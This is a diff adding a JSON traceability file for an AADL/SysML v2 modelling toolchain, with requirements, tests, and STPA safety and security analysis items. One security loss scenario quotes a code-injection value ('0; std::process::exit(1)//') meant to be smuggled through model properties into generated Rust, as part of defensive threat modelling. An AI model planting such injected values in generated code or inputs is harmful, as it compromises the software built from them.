+    "requirement": 47,
+    "sec-constraint": 13,
+    "sec-hazard": 11,
+    "sec-loss": 8,
+    "sec-scenario": 8,
+    "sec-uca": 9,
+    "sub-hazard": 12,
+    "system-constraint": 45,
+    "uca": 67
+  },
+  "total": 623
+}

--- a/data/spar/artifacts.json
+++ b/data/spar/artifacts.json
@@ -1,0 +1,8447 @@
+{
+  "artifacts": [
+    {
+      "description": "Verifies that setting Priority on threads suppresses the priority inversion advisory.\n",
+      "id": "VAL-056",
+      "links": [
+        {
+          "target": "STPA-REQ-031",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "No priority inversion advisory with Priority property",
+      "type": "feature"
+    },
+    {
+      "description": "When lowering SysML v2 constraint usages and attribute usages that carry numeric values with units (e.g., \"10 ms\"), the lowering must produce typed PropertyExpr values (IntegerLit/RealLit with unit annotation), not Opaque strings. Only expressions that genuinely cannot be parsed should use PropertyExpr::Opaque.\n",
+      "id": "STPA-REQ-035",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "sysml2",
+        "properties",
+        "stpa"
+      ],
+      "title": "SysML v2 typed property lowering for numeric constraints",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-18",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 lowering assigns wrong component category",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-S3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Resource accounting must include all bound components",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "",
+      "id": "CA-SEC-GENERATE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generate code from AADL model",
+      "type": "control-action"
+    },
+    {
+      "description": "Lowering from SysML v2 CST to AADL ItemTree implementing the SEI 2023 mapping specification. part def → system/process type, port def → data port, connection def → connection, constraint def → timing properties, allocate → deployment bindings. Requirements extracted to rivet YAML with satisfy/verify link preservation.\n",
+      "id": "ARCH-SYSML2-003",
+      "links": [
+        {
+          "target": "REQ-SYSML2-LOWER",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SYSML2-EXTRACT",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "architecture",
+        "sysml2",
+        "transform",
+        "v040"
+      ],
+      "title": "SysML v2 → AADL lowering via SEI mapping rules",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that when processor utilization exceeds the RMA bound but remains below 100%, the scheduling analysis emits an info diagnostic suggesting EDF scheduling as an alternative.\n",
+      "id": "VAL-039",
+      "links": [
+        {
+          "target": "STPA-REQ-024",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "RMA/EDF cross-check when above RMA bound",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe AADL source files after the solver's rewrite pass has applied\n\nthe computed binding properties.\n",
+      "id": "CP-AADL-SOURCE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "AADL Source Files (rewritten)",
+      "type": "controlled-process"
+    },
+    {
+      "description": "Added 80+ tests to property_value.rs validating every unit conversion pair for both TIME_UNITS (7 units) and SIZE_UNITS (6 units) against AS5506 Appendix A values. Tests include forward/reverse conversions, adjacent ratio verification, case insensitivity, cross-family failure, and edge cases.\n",
+      "id": "ARCH-016",
+      "links": [
+        {
+          "target": "STPA-REQ-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Comprehensive unit conversion validation tests",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-SEC-6",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verification harnesses must document coverage scope",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Verifies that each of the 14 SysML v2 lowering rules (part_def, port_def, connection_def, action_def, state_def, attribute_def, item_def, enum_def, interface_def, requirement_def, constraint_def, calc_def, allocation_def, connection_usage) produces the expected AADL construct with correct category and structure.\n",
+      "id": "VAL-059",
+      "links": [
+        {
+          "target": "STPA-REQ-036",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-029",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "SysML v2 lowering per-rule coverage",
+      "type": "feature"
+    },
+    {
+      "description": "The solver's resource accounting must include memory (Code_Size + Data_Size + Stack_Size for all threads and processes), CPU utilization (sum of WCET/Period for all threads), weight, and power consumption. Shared memory regions must be counted once per processor they reside on, not once per process that accesses them. An integration test must verify resource sums against hand-calculated values for a reference model.\n",
+      "id": "SOLVER-REQ-006",
+      "links": [],
+      "status": "not-implemented",
+      "tags": [
+        "safety",
+        "solver",
+        "allocation",
+        "resources",
+        "stpa"
+      ],
+      "title": "Complete resource accounting for allocations",
+      "type": "requirement"
+    },
+    {
+      "description": "Will verify that constraint usages with numeric values and units produce typed PropertyExpr values (not Opaque), enabling downstream scheduling and timing analysis. Blocked on STPA-REQ-035 implementation.\n",
+      "id": "VAL-062",
+      "links": [
+        {
+          "target": "STPA-REQ-035",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-028",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "SysML v2 typed property lowering (planned)",
+      "type": "feature"
+    },
+    {
+      "description": "\nAn AADL model contains A.impl with subcomponent b:\nB,\nand B.impl\n\nwith subcomponent a:\nA (mutual recursion). The instance builder\n\nhas no cycle detection. Expansion enters infinite recursion and\n\ncrashes with stack overflow. No diagnostics are produced. The\n\nengineer sees only \"process terminated\" with no explanation.\n",
+      "id": "LS-3",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Recursive instantiation overflow",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "80+ tests validate every time unit conversion pair (ps, ns, us, ms, sec, min, hr) against AS5506 Appendix A values. Includes forward/reverse conversions, adjacent ratio verification, and raw factor validation.\n",
+      "id": "VAL-032",
+      "links": [
+        {
+          "target": "STPA-REQ-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-016",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Time unit conversion pairs validated against AS5506",
+      "type": "feature"
+    },
+    {
+      "description": "Verifies get_execution_time_range returns correct (min, max) pairs for both range format (\"1 ms .. 5 ms\") and single values (\"3 ms\").\n",
+      "id": "VAL-057",
+      "links": [
+        {
+          "target": "STPA-REQ-027",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Execution time range accessor parses range and single value",
+      "type": "feature"
+    },
+    {
+      "description": "Translate AADL model properties into solver constraints: timing (Period, Deadline, WCET → scheduling feasibility), safety (ASIL/DAL → partition isolation), security (trust zones → encryption overhead), resources (memory/CPU/bandwidth budgets), physical (bus connectivity).\n",
+      "id": "REQ-SOLVER-003",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "solver",
+        "constraints",
+        "v030"
+      ],
+      "title": "Constraint formulation from AADL properties",
+      "type": "requirement"
+    },
+    {
+      "description": "Port connection, access connection, feature group connection, feature connection, parameter connection. With in_modes filtering.\n",
+      "id": "REQ-MODEL-004",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "model",
+        "as5506-ch9"
+      ],
+      "title": "Support all connection kinds",
+      "type": "requirement"
+    },
+    {
+      "description": "Tests for bus bandwidth analysis covering overload detection when aggregate demand exceeds capacity, normal utilization reporting, and graceful handling of missing Bandwidth_Capacity properties.\n",
+      "id": "VAL-BUS-001",
+      "links": [
+        {
+          "target": "REQ-BUS-001",
+          "type": "verifies"
+        },
+        {
+          "target": "ARCH-ANALYSIS-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "planned",
+      "tags": [],
+      "title": "Bus bandwidth utilization tests",
+      "type": "feature"
+    },
+    {
+      "description": "Verifies that record field expressions are checked against the corresponding field type in the RecordType definition.\n",
+      "id": "VAL-012",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Record field type checking",
+      "type": "feature"
+    },
+    {
+      "description": "modal.rs computes SOMs. Scheduling and latency analyses evaluate per-SOM when modal property associations exist.\n",
+      "id": "COVERAGE-CH12",
+      "links": [
+        {
+          "target": "REQ-INST-004",
+          "type": "satisfies"
+        }
+      ],
+      "status": "partial",
+      "tags": [],
+      "title": "AS5506 Ch.12: System Operation Modes",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that processor utilization below 80% does not trigger the clock drift advisory.\n",
+      "id": "VAL-052",
+      "links": [
+        {
+          "target": "STPA-REQ-029",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "No clock drift advisory at low utilization",
+      "type": "feature"
+    },
+    {
+      "description": "Aggregate SEI::GrossWeight and SEI::PowerBudget properties upward through the component hierarchy. Report when aggregate exceeds the capacity declared on the parent component.\n",
+      "id": "REQ-WEIGHTPOWER-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "resource",
+        "v030"
+      ],
+      "title": "Weight/power property aggregation up hierarchy",
+      "type": "requirement"
+    },
+    {
+      "description": "Before recursive instantiation, build the classifier reference graph and check for cycles. If a cycle is detected, emit an error diagnostic naming the cycle path and abort instantiation. Maximum recursion depth limit of 100 levels as a backup.\n",
+      "id": "STPA-REQ-012",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "instance",
+        "stpa"
+      ],
+      "title": "Circular containment detection",
+      "type": "requirement"
+    },
+    {
+      "description": "\nA small change to the AADL model (adding one port,\nrenaming a\n\ncomponent) causes a completely different layout,\nmaking it\n\nimpossible to compare before/after diagrams or build spatial\n\nmemory of the architecture.\n",
+      "id": "H-R4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Layout instability",
+      "type": "hazard"
+    },
+    {
+      "description": "Verifies that shared property accessors (get_timing_property, get_execution_time, get_size_property, get_processor_binding, extract_reference_target) parse property values correctly.\n",
+      "id": "VAL-035",
+      "links": [
+        {
+          "target": "STPA-REQ-015",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-017",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Typed property accessors parse correctly",
+      "type": "feature"
+    },
+    {
+      "description": "An integration test must verify that the SVG graph output contains the correct number of nodes and edges matching the instance model. Node labels must match component instance names. Edge connections must match the connection instances.\n",
+      "id": "STPA-REQ-021",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "output",
+        "rendering",
+        "stpa"
+      ],
+      "title": "SVG topology verification test",
+      "type": "requirement"
+    },
+    {
+      "description": "\nA SysML v2 model uses requirement defs and constraint defs to\n\nspecify security properties:\n\"data in transit must be encrypted\",\n\n\"component must run in isolated partition\". The lower_node function\n\nhas handlers for REQUIREMENT_DEF and CONSTRAINT_DEF that convert\n\nthem to AADL property annotations. However,\nif these constructs\n\nappear inside a context that routes through the wildcard `_ => {}`\n\n(e.g.,\nnested inside a flow def or verification case that is not\n\nhandled),\nthe security annotations are silently dropped. The\n\ngenerated AADL and subsequent code have no record of the\n\nsecurity requirements.\n",
+      "id": "LS-SEC-8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Attack path: SysML v2 wildcard drops security annotations",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "",
+      "id": "UCA-10",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis not registered",
+      "type": "uca"
+    },
+    {
+      "description": "Salsa database foundation. Defines SourceFile input and parse query. All other crates build on this.\n",
+      "id": "ARCH-BASE-DB",
+      "links": [
+        {
+          "target": "REQ-PARSE-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "spar-base-db",
+      "type": "design-decision"
+    },
+    {
+      "description": "Tests verifying that edge routing produces orthogonal (rectilinear) paths with minimized crossings and obstacle avoidance around component boxes.\n",
+      "id": "VAL-R2",
+      "links": [
+        {
+          "target": "RENDER-REQ-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-R2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "Orthogonal routing tests (RENDER-REQ-001)",
+      "type": "feature"
+    },
+    {
+      "description": "Regression guard verifying that a valid range (min < max < period) does not produce execution time range errors.\n",
+      "id": "VAL-047",
+      "links": [
+        {
+          "target": "STPA-REQ-027",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Valid execution time range produces no error",
+      "type": "feature"
+    },
+    {
+      "description": "schemas/sysml2.yaml defines sysml-requirement, sysml-component, sysml-interface, sysml-action artifact types for rivet integration.\n",
+      "id": "ARCH-SYSML2-SCHEMA",
+      "links": [
+        {
+          "target": "REQ-SYSML2-EXTRACT",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "v0.5.0",
+        "sysml2"
+      ],
+      "title": "SysML v2 Rivet schema",
+      "type": "design-decision"
+    },
+    {
+      "description": "Verifies that list elements are individually checked against the list element type, and mismatched elements produce diagnostics.\n",
+      "id": "VAL-008",
+      "links": [
+        {
+          "target": "STPA-REQ-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-005",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "List element type checking",
+      "type": "feature"
+    },
+    {
+      "description": "\nThe solver produces a binding configuration that appears schedulable\n\nbut causes deadline misses at runtime. Threads bound to overloaded\n\nprocessors miss their periods. End-to-end flows exceed latency\n\nbudgets. The deployed avionics system fails timing certification or,\n\nworse,\nexhibits timing failures in operation.\n",
+      "id": "L-S1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Deployed system misses timing deadlines",
+      "type": "loss"
+    },
+    {
+      "description": "\nSpar reports a defect that does not actually exist in the model,\n\ncausing unnecessary rework.\n",
+      "id": "H-2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Analysis produces false positive",
+      "type": "hazard"
+    },
+    {
+      "description": "mode_check.rs validates initial mode presence and uniqueness. mode_rules.rs checks mode transition legality. modal_rules.rs validates in_modes references.\n",
+      "id": "COVERAGE-CH10",
+      "links": [
+        {
+          "target": "REQ-ANALYSIS-007",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "AS5506 Ch.10: Modes — mode completeness and transitions",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Codegen writes file outside output directory",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-10",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Generated crate names may collide with public registry",
+      "type": "uca"
+    },
+    {
+      "description": "",
+      "id": "CC-S12",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Source rewrite must preserve existing properties",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nAn adversary crafts malicious SysML v2 or AADL input that causes\n\nspar codegen to emit Rust source,\nWIT interfaces,\nTOML configs,\nor\n\nBUILD.bazel files containing attacker-controlled content. The\n\ngenerated code is compiled and deployed as a WASM component or\n\nnative binary in a safety-critical system,\ngiving the attacker\n\narbitrary code execution within that component.\n",
+      "id": "L-SEC-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Attacker compromises generated code via model injection",
+      "type": "loss"
+    },
+    {
+      "description": "",
+      "id": "CA-SEC-VERIFY",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Run formal verification",
+      "type": "control-action"
+    },
+    {
+      "description": "",
+      "id": "CC-5",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Instance builder must include all non-modal subcomponents",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "Graph nodes gain explicit ports with side placement, direction indicators, and type metadata. Edges connect to specific ports rather than node centers, ensuring visual fidelity to the AADL connection topology.\n",
+      "id": "ARCH-R1",
+      "links": [
+        {
+          "target": "RENDER-REQ-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "implemented",
+      "tags": [],
+      "title": "Port-aware layout",
+      "type": "design-decision"
+    },
+    {
+      "description": "When two or more threads share a processor but no Priority or Concurrency_Control_Protocol property is set, the scheduling analysis must emit an info diagnostic advising that priority inversion blocking time should be accounted for in Compute_Execution_Time if threads share resources.\n",
+      "id": "STPA-REQ-031",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "scheduling",
+        "contention",
+        "stpa"
+      ],
+      "title": "Shared resource blocking time advisory",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that parsing AADL with an annex library produces a LoweringDiagnostic containing \"annex\" with Warning severity.\n",
+      "id": "VAL-001",
+      "links": [
+        {
+          "target": "STPA-REQ-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "ARCH-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Annex library diagnostic emission",
+      "type": "feature"
+    },
+    {
+      "description": "Added codegen golden model test and SysML v2 validation suite covering the 14 lowering rules. The test suite includes per-rule unit tests and a golden model comparison test that verifies end-to-end lowering of a non-trivial SysML v2 model against expected AADL output.\n",
+      "id": "ARCH-029",
+      "links": [
+        {
+          "target": "STPA-REQ-036",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 lowering golden model tests",
+      "type": "design-decision"
+    },
+    {
+      "description": "LSP server with diagnostics, hover, completion, go-to-definition, code actions, formatting, rename, and inlay hints.\n",
+      "id": "REQ-LSP-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "tooling",
+        "lsp"
+      ],
+      "title": "Language Server Protocol support",
+      "type": "requirement"
+    },
+    {
+      "description": "\nAn attacker contributes a SysML v2 model file to a shared repository.\n\nThe model contains a part def named \"r#mod\". During SysML v2 lowering,\n\nextract_name produces \"r#mod\". sanitize_ident converts it to \"r_mod\"\n\n(valid Rust identifier). The generated Rust code includes\n\n`pub struct RModPorts { ...\n}` — benign. However,\nthe attacker also\n\nincludes a property association with value \"0; std::process::exit(1)//\"\n\nwhich,\nafter format! interpolation into a comment or doc attribute,\n\ncould be rendered adjacent to executable code in an unexpected context.\n\nWhile current sanitize_ident prevents direct identifier injection,\nthe\n\nattack surface exists in property value interpolation into const values,\n\ndoc comments,\nand config file strings.\n",
+      "id": "LS-SEC-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Attack path: model-driven code injection via component name",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "The verus_verify and lean_verify rules produce proof log files but do not validate their content. The planned fix adds a post-verification check in the run_shell command that greps the log for expected success markers (\"verification results\" for Verus, \"All proofs verified.\" for Lean4). Empty or error-only logs cause the rule to fail with a diagnostic message.\n",
+      "id": "ARCH-032",
+      "links": [
+        {
+          "target": "STPA-REQ-039",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Proof log content validation in Bazel rules (planned)",
+      "type": "design-decision"
+    },
+    {
+      "description": "",
+      "id": "CC-SEC-4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "SysML v2 lowering must diagnose unhandled constructs",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "\nThe solver's source rewrite (inserting/modifying AADL property\n\nassociations via rowan CST editing) corrupts the model — breaking\n\nsyntax,\ninserting properties on the wrong component,\nremoving existing\n\nproperties,\nor producing whitespace/formatting that confuses\n\ndownstream tools. The engineer's source of truth is damaged.\n",
+      "id": "L-S4",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "AADL model corrupted by source rewrite",
+      "type": "loss"
+    },
+    {
+      "description": "The code generation pipeline must sanitize all model-derived names using language-specific rules before interpolation. Rust: reject names that are Rust keywords (even after r# prefix handling) and validate against Rust identifier grammar. WIT: reject names that collide with WIT built-in types (string, list, option, result, bool, u8-u64, s8-s64, f32, f64, char). Lean4: reject names that collide with Lean4 tactics (simp, omega, exact, apply, intro). TOML: escape quotes and special characters in string values. Starlark: reject Python/Starlark keywords.\n",
+      "id": "STPA-SEC-REQ-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "security",
+        "codegen",
+        "stpa-sec"
+      ],
+      "title": "Language-specific identifier sanitization for generated code",
+      "type": "requirement"
+    },
+    {
+      "description": "",
+      "id": "UCA-SEC-7",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Proof generator substitutes default timing values",
+      "type": "uca"
+    },
+    {
+      "description": "Compute SOMs as the cartesian product of modes across all modal subcomponents for each system level.\n",
+      "id": "REQ-INST-004",
+      "links": [],
+      "status": "partial",
+      "tags": [
+        "instance",
+        "as5506-ch12"
+      ],
+      "title": "System Operation Modes computation",
+      "type": "requirement"
+    },
+    {
+      "description": "\nSpar's connectivity analysis reports \"unconnected port\" for ports\n\nthat are intentionally unconnected (monitoring ports,\ndebug ports).\n\nAfter seeing many such false positives,\nthe engineer stops reading\n\nconnectivity diagnostics. A genuine unconnected safety-critical\n\nport is then missed among the noise.\n",
+      "id": "LS-8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Engineer dismisses analysis due to repeated false positives",
+      "type": "loss-scenario"
+    },
+    {
+      "description": "New spar-sysml2 crate: rowan-based parser for SysML v2 textual notation (KerML grammar). Same pattern as spar-parser. No Rust parser exists — the pilot implementation is Java-only. Three capabilities: 1. Parse .sysml files into rowan CST (like AADL parsing) 2. Lower SysML v2 system models to AADL execution platform models\n   where timing/scheduling semantics exist — implementing the\n   SEI mapping rules (sei.cmu.edu/annual-reviews/2023-year-in-review/\n   extending-sysml-v2-with-aadl-concepts)\n3. Extract SysML v2 requirement elements into rivet YAML artifacts Result: SysML v2 (system-level) → AADL (deployment-level) → WIT/code (implementation-level), with rivet tracing through all three layers and spar analyzing architecture at every level.\n",
+      "id": "REQ-INTEROP-001",
+      "links": [
+        {
+          "target": "REQ-SYSML2-PARSE",
+          "type": "traces-to"
+        },
+        {
+          "target": "REQ-SYSML2-LOWER",
+          "type": "traces-to"
+        },
+        {
+          "target": "REQ-SYSML2-EXTRACT",
+          "type": "traces-to"
+        }
+      ],
+      "status": "implemented",
+      "tags": [
+        "transform",
+        "sysml",
+        "interop",
+        "v050"
+      ],
+      "title": "SysML v2 textual notation parser + AADL lowering",
+      "type": "requirement"
+    },
+    {
+      "description": "Derive Serialize/Deserialize on all spar-hir public types. Support --format json on CLI commands.\n",
+      "id": "REQ-SERDE-001",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "integration",
+        "serde"
+      ],
+      "title": "JSON serialization of all public types",
+      "type": "requirement"
+    },
+    {
+      "description": "ConnectivityAnalysis checks SPAR_Properties::Intentionally_Unconnected on each component before emitting unconnected port warnings. The property value supports three formats: \"true\"/\"all\" (suppress all), a single feature name, or a comma-separated list (with optional parentheses). Matching is case-insensitive.\n",
+      "id": "ARCH-014",
+      "links": [
+        {
+          "target": "STPA-REQ-018",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Intentionally_Unconnected property suppresses connectivity warnings",
+      "type": "design-decision"
+    },
+    {
+      "description": "Validate memory budgets and bandwidth budgets against capacity.\n",
+      "id": "REQ-ANALYSIS-004",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "analysis",
+        "resource"
+      ],
+      "title": "Resource budget analysis",
+      "type": "requirement"
+    },
+    {
+      "description": "\nThe Bazel verification pipeline must fail loudly when verification\n\ntools (Verus,\nLean4,\nwasm-tools) are unavailable or produce errors.\n\nA green build must mean verification was actually performed,\nnot\n\nthat verification was skipped.\n",
+      "id": "SC-8",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Verification pipeline integrity",
+      "type": "system-constraint"
+    },
+    {
+      "description": "\nComponent,\nport,\npackage,\nand feature names from the AADL/SysML v2\n\nmodel are interpolated directly into generated Rust source code,\n\nWIT files,\nLean4 proofs,\nKani harnesses,\nTOML configs,\nand Bazel\n\nBUILD files. The sanitize_ident function strips non-alphanumeric\n\ncharacters but may not cover all injection vectors (e.g.,\nRust raw\n\nstrings,\nWIT keywords,\nLean4 tactics,\nTOML escape sequences,\nBazel\n\nStarlark injection).\n",
+      "id": "H-SEC-1",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Unsanitized model names in generated source code",
+      "type": "hazard"
+    },
+    {
+      "description": "",
+      "id": "CC-S16",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Certificate must be generated for every solver run",
+      "type": "controller-constraint"
+    },
+    {
+      "description": "The .aadl input files written by engineers",
+      "id": "CP-SOURCE",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "AADL Source Files",
+      "type": "controlled-process"
+    },
+    {
+      "description": "",
+      "id": "CTRL-LAYER2",
+      "links": [],
+      "status": "-",
+      "tags": [],
+      "title": "Layer 2 — Bus Binder (topology optimization)",
+      "type": "controller"
+    },
+    {
+      "description": "The CST-to-ItemTree lowering must match on all SyntaxKind variants that represent semantic AADL constructs. Any unhandled variant must produce a warning diagnostic \"unhandled construct: {kind}\". This should be enforced via a #[deny(unreachable_patterns)] attribute or explicit wildcard with diagnostic emission.\n",
+      "id": "STPA-REQ-004",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
+        "model",
+        "stpa"
+      ],
+      "title": "Lowering exhaustiveness check",
+      "type": "requirement"
+    },
+    {
+      "description": "Run all tests across all 10 crates (962+ tests).",
+      "id": "TEST-WORKSPACE",
+      "links": [
+        {
+          "target": "REQ-PARSE-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PARSE-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-MODEL-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-INST-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-INST-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-004",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-006",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-ANALYSIS-008",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SERDE-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PROP-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PROP-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-RESOLVE-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-RESOLVE-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SOLVER-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SOLVER-002",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SOLVER-003",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-SOLVER-007",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-TRANSFORM-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-LSP-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PARSER-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-REQ-020",
+          "type": "satisfies"
+        },
+        {
+          "target": "STPA-SEC-REQ-001",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH4",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH5",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH8",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH9",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH10",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH11",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH13",
+          "type": "satisfies"
+        },
+        {
+          "target": "COVERAGE-CH14",
+          "type": "satisfies"
+        }
+      ],
+      "status": "-",
+      "tags": [],
+      "title": "Full workspace test suite",
+      "type": "feature"
+    },
+    {
+      "description": "Not yet covered: Ch.7 (prototypes — parsed but not analyzed). Ch.6 type extensions now resolved via extends chain walking (v0.5.0). Property expression evaluation now covered by text fallback parser (v0.5.0).\n",
+      "id": "COVERAGE-GAPS",
+      "links": [
+        {
+          "target": "REQ-MODEL-005",
+          "type": "satisfies"
+        },
+        {
+          "target": "REQ-PROP-002",
+          "type": "satisfies"
+        }
+      ],
+      "status": "partial",
+      "tags": [],
+      "title": "Known analysis gaps",
+      "type": "requirement"
+    },
+    {
+      "description": "Verifies that multiple threads on the same processor without Priority or Concurrency_Control_Protocol trigger a priority inversion advisory.\n",
+      "id": "VAL-055",
+      "links": [
+        {
+          "target": "STPA-REQ-031",
+          "type": "satisfies"
+        }
+      ],
+      "status": "passing",
+      "tags": [],
+      "title": "Priority inversion advisory without Priority property",
+      "type": "feature"
+    },
+    {
+      "description": "When multiple classifiers in different packages match a reference and the reference is not fully qualified, the resolver must emit a warning listing all candidates and which one was selected.\n",
+      "id": "STPA-REQ-007",
+      "links": [],
+      "status": "implemented",
+      "tags": [
+        "safety",
